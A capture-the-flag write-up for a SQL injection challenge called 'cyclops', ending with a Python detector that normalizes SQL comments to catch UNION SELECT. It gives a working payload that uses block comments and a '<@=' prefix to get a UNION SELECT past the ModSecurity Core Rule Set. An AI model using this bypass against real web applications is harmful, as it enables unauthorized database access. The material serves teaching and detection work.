cyclops
We are provided with the SQL query:
SELECT id,pw FROM prob_cyclops WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'
In this challenge as well, the ModSecurity CRS is being used.
For this challenge, we have to use the UNION SELECT statement.
Let's try that by providing the following URI parameter:
?id=UNION SELECT
The resultant query becomes:
SELECT id,pw FROM prob_cyclops WHERE id='' UNION SELECT '' AND pw=''
As we can see, the input gets blocked. In order to get around this we have to use multi-line comments.
Multi-line comments
In SQL, multi-line comments are useful for commenting out large blocks of text.
SELECT * FROM table
/*
SELECT * FROM table
SELECT * FROM table
*/
We can utilize this to introduce space between the UNION and SELECT words as such:
UNION
/*
*/
SELECT
In order to get around the ModSecurity filter, we can use the previously used bypass and modify it to our needs. We need to select the first and second columns in order to solve this challenge.
If we provide the following URI parameter:
?id=-1'<@=1 UNION/**/SELECT 'first','second' -- -
The resultant query becomes:
SELECT id,pw FROM prob_cyclops WHERE id='-1'<@=1 UNION
/*
*/
SELECT 'first','second' -- -' AND pw=''
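From the detection side, the comment trick above only works against a signature that expects plain whitespace between the two keywords. The following is an added example, not code from this write-up or from the ModSecurity CRS: it replaces block comments with a space before matching, and the function names and sample list are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Naive signature: only matches when plain whitespace separates the keywords.
NAIVE = re.compile(r"union\s+select", re.I)
# Block comments, including ones spanning lines or left unterminated.
BLOCK_COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)
# Keyword pair with word boundaries, checked after normalization.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)


def normalize(raw: str) -> str:
    """URL-decode, replace each /* ... */ with one space, collapse whitespace.

    Same idea as ModSecurity's t:replaceComments transformation.
    """
    text = unquote_plus(raw)
    text = BLOCK_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def naive_hit(raw: str) -> bool:
    """Match on the decoded value without removing comments."""
    return bool(NAIVE.search(unquote_plus(raw)))


def normalized_hit(raw: str) -> bool:
    """Match on the value after comments and whitespace are normalized."""
    return bool(UNION_SELECT.search(normalize(raw)))


# Constructed samples: the two id values from this page, a variant with a
# newline inside the comment, and a benign value.
SAMPLES = [
    "UNION SELECT",
    "-1'<@=1 UNION/**/SELECT 'first','second' -- -",
    "-1'<@=1 UNION/*%0a*/SELECT 'first','second' -- -",
    "student union selection committee",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_hit(s)!s:5} normalized={normalized_hit(s)!s:5} {s!r}")
```

Pattern matching of this kind is a second line of defence; the query in this challenge stops being injectable only when id and pw are bound as parameters instead of being interpolated into the string.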